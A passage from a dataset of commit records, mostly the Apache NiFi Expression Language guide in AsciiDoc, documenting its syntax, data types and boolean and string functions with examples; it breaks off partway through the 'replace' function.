nowgood bye world now`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== count\n\n*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the\n\t`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`. 
This function\n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"number_list\" contains \"1,2,3,4,5\", consider the following examples:\n\n.count Examples\n|===========================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):count()}` | `2`\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\"):count()}` | `2`\n| `${allDelineatedValues(${number_list}, \",\"):count()}` | `5`\n| `${allAttributes(\"abc\", \"non-existent-attr\", \"xyz\"):count()}` | `2`\n| `${allMatchingAttributes(\".*\"):length():gt(10):count()}` | `2`\n|===========================================================================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e631c493d49ff71d4407eea281259bdfaeedd3c5","subject":"NIFI-218: Added isEmpty and replaceEmpty functions to doc","message":"NIFI-218: Added isEmpty and replaceEmpty functions to doc\n","repos":"ShellyLC\/nifi,YolandaMDavis\/nifi,MikeThomsen\/nifi,jskora\/nifi,WilliamNouet\/ApacheNiFi,aperepel\/nifi,jfrazee\/nifi,alopresto\/nifi,tequalsme\/nifi,aperepel\/nifi,jjmeyer0\/nifi,dlukyanov\/nifi,joetrite\/nifi,mcgilman\/nifi,trixpan\/nifi,josephxsxn\/nifi,InspurUSA\/nifi,tequalsme\/nifi,peter-gergely-horvath\/nifi,tijoparacka\/nifi,MikeThomsen\/nifi,PuspenduBanerjee\/nifi,pvillard31\/nifi,ShellyLC\/nifi,WilliamNouet\/ApacheNiFi,jfrazee\/nifi,bbende\/nifi,mattyb149\/nifi,tequalsme\/nifi,bbende\/nifi,joetrite\/nifi,peter-gergely-horvath\/nifi,Wesley-Lawrence\/nifi,tequalsme\/nifi,josephxsxn\/nifi,mcgilman\/nifi,trixpan\/nifi,joetrite\/nifi,zhengsg\/nifi,jtstorck\/nifi,ijokarumawak\/nifi,jtstorck\/nifi,alopresto\/nifi,jfrazee\/nifi,ijokarumawak\/nifi,jfrazee\/nifi,bbende\/nifi,joetrite\/nifi,joewitt\/incubator-nifi,InspurUSA\/nifi,tijoparacka\/nifi,YolandaMDavis\/nifi,bbende\/nifi,speddy93\/nifi,m-hogue\/nifi,aperepel\/nifi,apsaltis\/nifi,jjmeyer0\/nifi,tijoparacka\/nifi,qfdk\/nifi,YolandaMDavis\/nifi,josephxsxn\/nifi,qfdk\/nifi,jtstorck\/nifi,YolandaMDavis\/nifi,jjmeyer0\/nifi,WilliamNouet\/nifi,zhengsg\/nifi,ijokarumawak\/nifi,alopresto\/nifi,jskora\/nifi,michalklempa\/nifi,WilliamNouet\/ApacheNiFi,michalklempa\/nifi,zhengsg\/nifi,ijokarumawak\/nifi,patricker\/nifi,Xsixteen\/nifi,Wesley-Lawrence\/nifi,joewitt\/incubator-nifi,jtstorck\/nifi,pvillard31\/nifi,jfrazee\/nifi,dlukyanov\/nifi,joetrite\/nifi,patricker\/nifi,jjmeyer0\/nifi,pvillard31\/nifi,ShellyLC\/nifi,peter-gergely-horvath\/nifi,patricker\/nifi,Xsixteen\/nifi,Wesley-Lawrence\/nifi,joewitt\/incubator-nifi,jtstorck\/nifi,WilliamNouet\/ApacheNiFi,ShellyLC\/nifi,apsaltis\/nifi,mans2singh\/nifi,thesolson\/nifi,dlukyanov\/nifi,mattyb149\/nifi,mans2singh\/nifi,michalklempa\/nifi,tijoparacka\/nifi,MikeThomsen\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,WilliamNouet\/ApacheNiFi,bbende\/nifi,apsaltis\/nifi,josephxsxn\/nifi,WilliamNouet\/nifi,jskora\/nifi,patricker\/nifi,Xsixteen\/nifi,MikeThomsen\/nifi,mans2singh\/nifi,MikeThomsen\/nifi,peter-gergely-horvath\/nifi,m-hogue\/nifi
,speddy93\/nifi,Wesley-Lawrence\/nifi,m-hogue\/nifi,dlukyanov\/nifi,MikeThomsen\/nifi,thesolson\/nifi,zhengsg\/nifi,joewitt\/incubator-nifi,Wesley-Lawrence\/nifi,alopresto\/nifi,MikeThomsen\/nifi,aperepel\/nifi,mattyb149\/nifi,Xsixteen\/nifi,mcgilman\/nifi,peter-gergely-horvath\/nifi,dlukyanov\/nifi,joetrite\/nifi,Wesley-Lawrence\/nifi,mcgilman\/nifi,trixpan\/nifi,ijokarumawak\/nifi,jtstorck\/nifi,patricker\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,michalklempa\/nifi,qfdk\/nifi,YolandaMDavis\/nifi,apsaltis\/nifi,tijoparacka\/nifi,qfdk\/nifi,Xsixteen\/nifi,ShellyLC\/nifi,YolandaMDavis\/nifi,m-hogue\/nifi,InspurUSA\/nifi,WilliamNouet\/nifi,jskora\/nifi,joewitt\/incubator-nifi,PuspenduBanerjee\/nifi,jjmeyer0\/nifi,speddy93\/nifi,tequalsme\/nifi,m-hogue\/nifi,jfrazee\/nifi,thesolson\/nifi,Wesley-Lawrence\/nifi,WilliamNouet\/nifi,WilliamNouet\/ApacheNiFi,trixpan\/nifi,ijokarumawak\/nifi,mans2singh\/nifi,jskora\/nifi,bbende\/nifi,dlukyanov\/nifi,mans2singh\/nifi,patricker\/nifi,alopresto\/nifi,thesolson\/nifi,alopresto\/nifi,pvillard31\/nifi,aperepel\/nifi,ShellyLC\/nifi,speddy93\/nifi,mans2singh\/nifi,pvillard31\/nifi,InspurUSA\/nifi,YolandaMDavis\/nifi,mattyb149\/nifi,Xsixteen\/nifi,pvillard31\/nifi,jjmeyer0\/nifi,mcgilman\/nifi,ijokarumawak\/nifi,jskora\/nifi,zhengsg\/nifi,apsaltis\/nifi,josephxsxn\/nifi,jfrazee\/nifi,m-hogue\/nifi,tijoparacka\/nifi,apsaltis\/nifi,aperepel\/nifi,patricker\/nifi,mcgilman\/nifi,thesolson\/nifi,joewitt\/incubator-nifi,pvillard31\/nifi,michalklempa\/nifi,InspurUSA\/nifi,zhengsg\/nifi,speddy93\/nifi,InspurUSA\/nifi,trixpan\/nifi,qfdk\/nifi,joewitt\/incubator-nifi,jtstorck\/nifi,trixpan\/nifi,Xsixteen\/nifi,qfdk\/nifi","old_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one or more\n\/\/ contributor license agreements. See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\nApache NiFi Expression Language Guide\n=====================================\nApache NiFi Team <dev@nifi.incubator.apache.org>\n:homepage: http:\/\/nifi.incubator.apache.org\n\n[[overview]]\nOverview\n--------\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the \nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. 
Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile.\n\nHowever, placing these attributes on a FlowFile does not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\nStructure of a NiFi Expression\n------------------------------\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the ``filename''\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the ``filename''\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of five elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, ``toUpper''. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions>> section, with an explanation of what the function does, the arguments that it\nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a ``special character,'' the attribute name must be escaped by quoting it. 
The following\ncharacters are each considered ``special characters'':\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a ``special character'' if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute name, the attribute name must be quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named ``my attribute'': `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" attribute, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be chained together, as well. For example, `${hostname():toUpper()}`. Attempting to\nevaluate the function with a subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOftentimes, we will need to compare the values of two different attributes to each other.\nWe are able to accomplish this by using embedded Expressions. We can, for example, check if\nthe ``filename'' attribute is the same as the ``uuid'' attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a Processor property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will display a tooltip that\nprovides helpful information about the Property. 

[[usage]]
== Expression Language in the Application

The Expression Language is used heavily throughout the NiFi application for configuring Processor
properties. Not all Processor properties support the Expression Language, however. Whether or not
a Property supports the Expression Language is determined by the developer of the Processor when
the Processor is written. However, the application strives to clearly illustrate for each Property
whether or not the Expression Language is supported.

In the application, when configuring a Processor property, the User Interface provides an Information
icon (
image:iconInfo.png["Info"]
) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that
provides helpful information about the Property. This information includes a description of the Property,
the default value (if any), historically configured values (if any), and whether or not this Property
supports the Expression Language.


[[editor]]
=== Expression Language Editor

When configuring the value of a Processor property, the NiFi User Interface provides help with the
Expression Language using the Expression Language editor. Once an Expression is begun by typing `${`,
the editor begins to highlight parentheses and braces so that the user is easily able to tell which
opening parenthesis or brace matches which closing parenthesis or brace.

The editor also supplies context-sensitive help by providing a list of all functions that can be used
at the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user
is also able to type part of a function name and then press Ctrl+Space to see all functions that can
be used that start with the same prefix. For example, if we type into the editor `${filename:to`
and then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,
`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow
which functions are shown, or we can select one of the functions from the list by double-clicking
it with the mouse or using the arrow keys to highlight the desired function and pressing Enter.


[[functions]]
== Functions

Functions provide a convenient way to manipulate and compare values of attributes. The Expression Language
provides many different functions to meet the needs of an automated dataflow. Each function takes
zero or more arguments and returns a single value. These functions can then be chained together to create
powerful Expressions to evaluate conditions and manipulate values. See <<structure>> for more information
on how to call and chain functions together.

[[types]]
=== Data Types

Each argument to a function and each value returned from a function has a specific data type. The Expression
Language supports three different data types:

- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and
	special characters.
- *Number*: A Number is an integer comprised of one or more digits (`0` through `9`). The Expression Language
	does not provide support for fractional numbers. Dates and times are represented in the
	Expression Language as Numbers, representing the number of milliseconds since midnight GMT on January 1, 1970.
- *Boolean*: A Boolean is one of either `true` or `false`.

All attributes are considered to be of type String.

The Expression Language is generally able to automatically coerce a value of one data type to the appropriate
data type for a function. However, functions do exist to manually coerce a value into a specific data type.
See the <<type_cast>> section for more information.


[[boolean]]
== Boolean Logic

One of the most powerful features of the Expression Language is the ability to compare an attribute value against
some other value. This is used often, for example, to configure how a Processor should route data. The following
functions are used for performing boolean logic, such as comparing two values.
Each of these functions returns a value of type Boolean.
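
For instance, a Processor that routes data might be configured with a property whose value is a Boolean
Expression such as the following sketch, which is `true` only for FlowFiles whose content is larger than
one megabyte (the `gt` function is described below; the routing scenario itself is illustrative):

-----------------------------------------------
${fileSize:gt(1048576)}
-----------------------------------------------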

[.function]
=== isNull
*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine
	if an attribute exists.#

*Subject Type*: [.subject]#Any#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*:	`${filename:isNull()}` returns `true` if the "filename" attribute does not exist.
	It returns `false` if the attribute exists.



[.function]
=== notNull
*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the
	subject exists and `false` otherwise.#

*Subject Type*: [.subject]#Any#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*: `${filename:notNull()}` returns `true` if the "filename" attribute exists. It returns `false` if the attribute
	does not exist.



[.function]
=== isEmpty
*Description*: [.description]#The `isEmpty` function returns `true` if the Subject is null or contains only white-space
	(new line, carriage return, space, tab), `false` otherwise.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*: `${filename:isEmpty()}` returns `true` if the "filename" attribute does not exist or contains only
	white space.



[.function]
=== equals

*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.
	Note that the `equals` function performs a direct comparison of two String values. Take care not to confuse this
	function with the <<matches>> function, which evaluates its subject against a Regular Expression.#

*Subject Type*: [.subject]#Any#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#

*Return Type*: [.returnType]#Boolean#

*Examples*:
We can check if the filename of a FlowFile is "hello.txt" by using the expression `${filename:equals('hello.txt')}`,
or we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:
`${hello:equals( ${filename} )}`.



[.function]
=== equalsIgnoreCase
*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value,
	but returns `true` even if the two values differ only by case (upper case vs. lower case).#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to "hello.txt"
	or "HELLO.TXT" or "HeLLo.TxT".
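
The distinction between direct String comparison and Regular Expression matching is a common source of
confusion, so a side-by-side sketch may help (the <<matches>> function is described in the Searching
section below; both results assume the usual ``hello.txt'' value):

-----------------------------------------------
${filename:equals('hello.txt')}   -> true only for the exact String "hello.txt"
${filename:matches('h.*\.txt')}   -> true for "hello.txt", "hi.txt", "h123.txt", ...
-----------------------------------------------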

[.function]
=== gt
*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than
	its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte
	(1024 bytes). Otherwise, it will return `false`.



[.function]
=== ge
*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than
	Or Equal To its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least
	(is greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.



[.function]
=== lt
*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than
	its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than
	1 megabyte (1048576 bytes). Otherwise, it will return `false`.



[.function]
=== le
*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than
	Or Equal To its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most
	(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.
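
These four comparison functions are often combined with the `and` function (described next) to express a
range check. A minimal sketch, `true` when the FlowFile's content is between 1 kilobyte and 1 megabyte,
inclusive:

-----------------------------------------------
${fileSize:ge(1024):and( ${fileSize:le(1048576)} )}
-----------------------------------------------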

[.function]
=== and
*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject
	and the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,
	the function returns `false`. Typically, this is used with an embedded Expression as the argument.#

*Subject Type*: [.subject]#Boolean#

*Arguments*:

	- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#

*Return Type*: [.returnType]#Boolean#

*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression
-----------------------------------------------
${filename:toLower():equals( ${filename} ):and(
	${filename:length():ge(5)}
)}
-----------------------------------------------



[.function]
=== or

*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject
	or the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If
	either the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#

*Subject Type*: [.subject]#Boolean#

*Arguments*:

	- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'or' Expression#

*Return Type*: [.returnType]#Boolean#

*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if
	the filename is all lower-case.
----------------------------------------------
${filename:toLower():equals( ${filename} ):or(
	${filename:length():equals(5)}
)}
----------------------------------------------



[.function]
=== not

*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#

*Subject Type*: [.subject]#Boolean#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*: We can invert the value of another function by using the `not` function, as
	`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to
	"hello.txt" and will return `false` if the filename is "hello.txt."
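
Because every one of these functions returns a Boolean, they can be nested to arbitrary depth. As a sketch,
the following Expression is `true` when the ``filename'' attribute is present and is either ``hello.txt''
or ``HELLO.TXT'':

-----------------------------------------------
${filename:isEmpty():not():and(
	${filename:equals('hello.txt'):or( ${filename:equals('HELLO.TXT')} )}
)}
-----------------------------------------------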

[[strings]]
== String Manipulation

Each of the following functions manipulates a String in some way.



[.function]
=== toUpper

*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it
	replaces any lowercase letter with the uppercase equivalent.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute is "abc123.txt", then the Expression `${filename:toUpper()}`
	will return "ABC123.TXT"



[.function]
=== toLower

*Description*: [.description]#This function converts the Subject into an all lower-case String. Said another way,
	it replaces any uppercase letter with the lowercase equivalent.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute is "ABC123.TXT", then the Expression `${filename:toLower()}`
	will return "abc123.txt"



[.function]
=== trim

*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the attribute `attr` has the value " 1 2 3 ", then the Expression `${attr:trim()}` will
	return the value "1 2 3".



[.function]
=== urlEncode

*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an
	attribute value to indicate the URL of a website.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: We can URL-Encode an attribute named "url" by using the Expression `${url:urlEncode()}`. If
	the value of the "url" attribute is "https://nifi.incubator.apache.org/some value with spaces", this
	Expression will then return "https://nifi.incubator.apache.org/some%20value%20with%20spaces".



[.function]
=== urlDecode

*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If we have a URL-Encoded attribute named "url" with the value
	"https://nifi.incubator.apache.org/some%20value%20with%20spaces", then the Expression
	`${url:urlDecode()}` will return "https://nifi.incubator.apache.org/some value with spaces".



[.function]
=== substring

*Description*:
[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.
	If the _ending index_ is not supplied, it will return the portion of the Subject starting at the given
	_starting index_ and ending at the end of the Subject value.#

[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using
	the value `0`, not `1`.#

[.description]#If either the _starting index_ or the _ending index_ is not a number, this function call will result
	in an error.#

[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#

[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value
	less than 0, this function call will result in an error.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#
	- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#

*Return Type*: [.returnType]#String#

*Examples*:

If we have an attribute named "filename" with the value "a brand new filename.txt",
then the following Expressions will result in the following values:

.Substring Examples
|================================================================
| Expression | Value
| `${filename:substring(0,1)}` | `a`
| `${filename:substring(2)}` | `brand new filename.txt`
| `${filename:substring(12)}` | `filename.txt`
| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`
|================================================================
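
A common use of `substring` is shortening a long identifier. Assuming (hypothetically) that the standard
`uuid` attribute has the value "de305d54-75b4-431b-adb2-eb6b9e546013", the following sketch keeps only the
first eight characters:

-----------------------------------------------
${uuid:substring(0, 8)}   -> "de305d54"
-----------------------------------------------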

[.function]
=== substringBefore

*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject
	and ending with the character immediately before the first occurrence of the argument. If
	the argument is not present in the Subject, the entire Subject will be returned.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt",
	then the following Expressions will result in the following values:

.SubstringBefore Examples
|======================================================================
| Expression | Value
| `${filename:substringBefore('.')}` | `a brand new filename`
| `${filename:substringBefore(' ')}` | `a`
| `${filename:substringBefore(' n')}` | `a brand`
| `${filename:substringBefore('missing')}` | `a brand new filename.txt`
|======================================================================



[.function]
=== substringBeforeLast

*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject
	and ending with the character immediately before the last occurrence of the argument. If
	the argument is not present in the Subject, the entire Subject will be returned.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt",
	then the following Expressions will result in the following values:

.SubstringBeforeLast Examples
|==========================================================================
| Expression | Value
| `${filename:substringBeforeLast('.')}` | `a brand new filename`
| `${filename:substringBeforeLast(' ')}` | `a brand new`
| `${filename:substringBeforeLast(' n')}` | `a brand`
| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`
|==========================================================================



[.function]
=== substringAfter

*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after
	the first occurrence of the argument and extending to the end of the Subject. If
	the argument is not present in the Subject, the entire Subject will be returned.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt",
	then the following Expressions will result in the following values:

.SubstringAfter Examples
|======================================================================
| Expression | Value
| `${filename:substringAfter('.')}` | `txt`
| `${filename:substringAfter(' ')}` | `brand new filename.txt`
| `${filename:substringAfter(' n')}` | `ew filename.txt`
| `${filename:substringAfter('missing')}` | `a brand new filename.txt`
|======================================================================

[.function]
=== substringAfterLast

*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after
	the last occurrence of the argument and extending to the end of the Subject. If
	the argument is not present in the Subject, the entire Subject will be returned.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt",
	then the following Expressions will result in the following values:

.SubstringAfterLast Examples
|=========================================================================
| Expression | Value
| `${filename:substringAfterLast('.')}` | `txt`
| `${filename:substringAfterLast(' ')}` | `filename.txt`
| `${filename:substringAfterLast(' n')}` | `ew filename.txt`
| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`
|=========================================================================
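
Taken together, these delimiter-based functions make quick work of pulling a filename apart. A sketch,
using the running example value ``a brand new filename.txt'':

-----------------------------------------------
${filename:substringAfterLast('.')}    -> "txt"                   (the extension)
${filename:substringBeforeLast('.')}   -> "a brand new filename"  (the base name)
-----------------------------------------------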

[.function]
=== append

*Description*: [.description]#The `append` function returns the result of appending the argument to the value of
	the Subject. If the Subject is null, returns the argument itself.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:append('.gz')}` will return "a brand new filename.txt.gz".



[.function]
=== prepend

*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of
	the Subject. If the subject is null, returns the argument itself.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "filename.txt", then the Expression
	`${filename:prepend('a brand new ')}` will return "a brand new filename.txt".



[.function]
=== replace

*Description*: [.description]#Replaces occurrences of one String within the Subject with another String.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#
	- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the following
